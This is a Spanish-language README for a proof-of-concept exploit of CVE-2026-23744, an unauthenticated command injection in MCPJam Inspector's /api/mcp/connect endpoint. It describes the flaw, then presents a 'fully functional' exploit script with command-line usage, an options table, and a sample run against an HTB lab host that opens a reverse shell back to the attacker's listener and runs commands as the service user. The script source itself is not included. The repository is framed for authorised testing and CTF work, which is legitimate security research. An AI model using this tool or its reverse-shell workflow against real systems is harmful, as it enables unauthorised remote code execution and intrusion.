
CVE-2026-23744 es una inyección de comandos no autenticada en MCPJam Inspector ≤1.4.2 a través de /api/mcp/connect. Este POC lo explota enviando una carga útil JSON manipulada para ejecutar comandos arbitrarios, otorgando una reverse shell con PTY.
Esta prueba de concepto se proporciona exclusivamente para investigación de seguridad autorizada, fines educativos y entornos de laboratorio controlados (p. ej., HTB, CTF o pruebas de penetración internas con consentimiento explícito por escrito). El uso no autorizado contra cualquier sistema sin permiso es ilegal y poco ético. El autor no asume ninguna responsabilidad por el mal uso; los usuarios son los únicos responsables de cumplir con todas las leyes y regulaciones aplicables.
CVE-2026-23744 es una vulnerabilidad de inyección de comandos no autenticada en MCPJam Inspector (versión ≤ 1.4.2).
El endpoint /api/mcp/connect acepta un payload JSON con serverConfig.command y serverConfig.args y los pasa directamente a un spawn de proceso del sistema sin ninguna sanitización. Un atacante puede enviar una solicitud manipulada para ejecutar comandos arbitrarios del sistema, obteniendo una shell inversa con los privilegios del usuario del servicio.
Este repositorio contiene un script de exploit completamente funcional con un listener interactivo automático opcional basado en PTY (habilitado por defecto).
requests (pip install requests)Importante: Proporcione solo el nombre de host o la IP. El script añade automáticamente http:// o https://
python3 exploit.py -t <target> -l <your_ip> [-r <port>] [--ssl] [--check-only]
| Opción | Descripción |
|---|---|
-t, --target | Nombre de host o IP de destino (obligatorio) |
-p, --port | Puerto de destino (por defecto: 6274) |
-l, --lhost | Tu IP para la shell inversa (obligatorio) |
-r, --lport | Tu puerto de listener (por defecto: 4444) |
--ssl | Usar HTTPS en lugar de HTTP |
--check-only | Solo comprobar la vulnerabilidad, no enviar la shell |
El script inicia su propio listener y te proporciona una shell directamente en tu terminal.
python3 exploit.py -t <example_hostname> -l <your_IP> -r <Listener_Port>
$ python3 exploit.py -t devhub.htb -l 10.10.14.111 -r 4444
[*] Target URL: http://devhub.htb:6274/api/mcp/connect
[*] Checking target...
[+] Target responded with 400 – appears vulnerable
[*] Sending exploit payload...
[+] ReadTimeout – shell likely spawned!
[*] Payload sent. Check your listener!
# On your listener:
connect to [10.10.14.111] from (UNKNOWN) [10.129.245.216] 54150
mcp-dev@devhub:/opt/mcpjam$ id
uid=1001(mcp-dev) gid=1001(mcp-dev) groups=1001(mcp-dev)
root.Este repositorio es solo para fines educativos y de pruebas autorizadas. Úselo bajo su propio riesgo.
Autor: Mluex0
Fecha: agosto de 2026